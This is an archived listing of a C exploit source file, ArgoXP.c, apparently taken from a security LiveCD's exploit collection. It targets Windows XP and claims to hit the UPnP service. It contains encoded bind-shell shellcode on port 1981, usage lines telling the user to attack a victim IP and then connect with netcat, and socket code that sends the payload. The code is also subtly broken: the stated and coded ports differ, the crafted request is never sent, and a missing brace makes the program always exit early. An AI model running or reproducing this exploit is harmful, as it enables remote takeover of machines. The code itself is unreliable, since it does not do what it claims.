home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / remote / ArgoXP.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  5KB  |  152 lines

  1. /*
  2.  
  3. ***************** EXPLOIT CODED BY JOCANOR *****************
  4.  
  5. **************PRIVATE DO NOT DISTRIBUTE*********************
  6.  
  7. this is a new and functional exploit for de vulnerability
  8. affects to windows xp, at the service UPNP, port 5000.
  9.  
  10. this exploit is a part of ASQ12 project, same as XPhack.c coded 
  11. also be me...
  12.  
  13. you only type:
  14.  
  15.   argoxp victimip
  16.  
  17. and later, in another cmd type:
  18.  
  19.   nc victimip 1981
  20.  
  21. note:
  22.  
  23. you need netcat.
  24.  
  25. note2:
  26.  
  27. this exploit affects to windows xp + sp0 english version.
  28.  
  29. ***************** EXPLOIT CODED BY JOCANOR *****************
  30.  
  31. */
  32. #include <stdio.h>
  33. #include <windows.h>
  34.  
  35. #pragma comment(lib, "ws2_32")
  36.  
  37. char shell[] = //bind port 1981
  38.         "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x66\x01\x80\x34\x0A\x99\xE2\xFA"
  39.         "\xEB\x05\xE8\xEB\xFF\xFF\xFF" 
  40.         "\x70\x99\x98\x99\x99\xC3\x21\x95\x69\x64\xE6\x12\x99\x12\xE9\x85"
  41.         "\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12\xEF\xE1\x9A\x6A"
  42.         "\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A"
  43.         "\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC"
  44.         "\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58"
  45.         "\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12"
  46.         "\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71"
  47.         "\xE5\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3"
  48.         "\x9D\xC0\x71\xF0\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66"
  49.         "\xCE\x69\x12\x41\x5E\x9E\x9B\x99\x9E\x24\xAA\x59\x10\xDE\x9D\xF3"
  50.         "\x89\xCE\xCA\x66\xCE\x6D\xF3\x98\xCA\x66\xCE\x61\xC9\xC9\xCA\x66"
  51.         "\xCE\x65\x1A\x75\xDD\x12\x6D\xAA\x42\xF3\x89\xC0\x10\x85\x17\x7B"
  52.         "\x62\x10\xDF\xA1\x10\xDF\xA5\x10\xDF\xD9\x5E\xDF\xB5\x98\x98\x99"
  53.         "\x99\x14\xDE\x89\xC9\xCF\xCA\xCA\xCA\xF3\x98\xCA\xCA\x5E\xDE\xA5"
  54.         "\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xCA\x66\xCE\x7D\xC9\x66\xCE\x71"
  55.         "\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32"
  56.         "\x7B\x77\xAA\x59\x5A\x71\x62\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6"
  57.         "\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9"
  58.         "\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA"
  59.         "\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8"
  60.         "\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC"
  61.         "\xED\xD8\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8"
  62.         "\xFA\xFA\xFC\xE9\xED\x99";
  63.  
  64.  
  65. int main(int argc, char *argv[])
  66.  
  67. {
  68.  
  69. char recvbuf[1600];
  70. char szRequest[2048]; 
  71. char szJmpCode[281];
  72. char szExeCode[840]; 
  73. int i;
  74. WSADATA wsa;
  75. struct hostent *he;
  76. struct sockaddr_in their_addr;
  77. int len, sockfd;
  78. short dport = 445;
  79.  
  80.  
  81. printf("\n                  ArgoXP 1.0 beta     \n");
  82. printf("              ExPlOiT CoDeD By: JoCaNoR \n");
  83. printf("Member of: SlackTeam...Jocanor, nkde, zet4 & zerok\n");
  84. printf("          .-.-.Especial thanks to Neo_geno & Lide.-.-.\n\n");
  85.  
  86. if (argc < 2)
  87. {
  88. printf("How to use: ");
  89. printf("Argoxp <victim ip>\n\n");
  90. exit(0);
  91. }
  92.  
  93.  
  94. for(i=0; i<268; i++) szJmpCode[i]=(char)0x90;
  95.  
  96. szJmpCode[268]=(char)0x4D; szJmpCode[269]=(char)0x3F;
  97. szJmpCode[270]=(char)0xE3; szJmpCode[271]=(char)0x77;
  98. szJmpCode[272]=(char)0x90; szJmpCode[273]=(char)0x90;
  99. szJmpCode[274]=(char)0x90; szJmpCode[275]=(char)0x90;
  100.         
  101.  
  102. szJmpCode[276]=(char)0xFF; szJmpCode[277]=(char)0x63;
  103. szJmpCode[278]=(char)0x64; szJmpCode[279]=(char)0x90;
  104. szJmpCode[280]=(char)0x00;
  105.  
  106. for(i=0; i<32; i++) szExeCode[i]=(char)0x90;
  107. szExeCode[32]=(char)0x00;
  108.  
  109. strcat(szExeCode, shell);
  110. sprintf(szRequest, "%s%s\r\n\r\n", szJmpCode, szExeCode);
  111.  
  112. WSAStartup(MAKEWORD(2,0),&wsa);
  113.  
  114. if ((he=gethostbyname(argv[1])) == NULL) 
  115. perror("Unable to resolve");
  116. exit(1);
  117. }
  118.  
  119. if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) 
  120. {
  121. perror("socket error");
  122. exit(1);
  123. }
  124.  
  125. their_addr.sin_family = AF_INET;
  126. their_addr.sin_port = htons(dport);
  127. their_addr.sin_addr = *((struct in_addr *)he->h_addr);
  128. memset(&(their_addr.sin_zero), '\0', 8);
  129.  
  130. printf("Waiting for connection...");
  131. if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
  132. {
  133. printf("\nError, unable to connect!!!");
  134. exit(1);
  135. }
  136.  
  137. printf("Connected!!!\n");
  138.  
  139. if (send(sockfd, shell, sizeof(shell)-1, 0) == -1) 
  140. {
  141. printf("Error :(:(:(\n");
  142. exit(1);
  143. }
  144.  
  145. printf("OoOoOps shell!!\n");
  146. len = recv(sockfd, recvbuf, 1600, 0);
  147.  
  148. return 0; 
  149.  
  150. }
  151.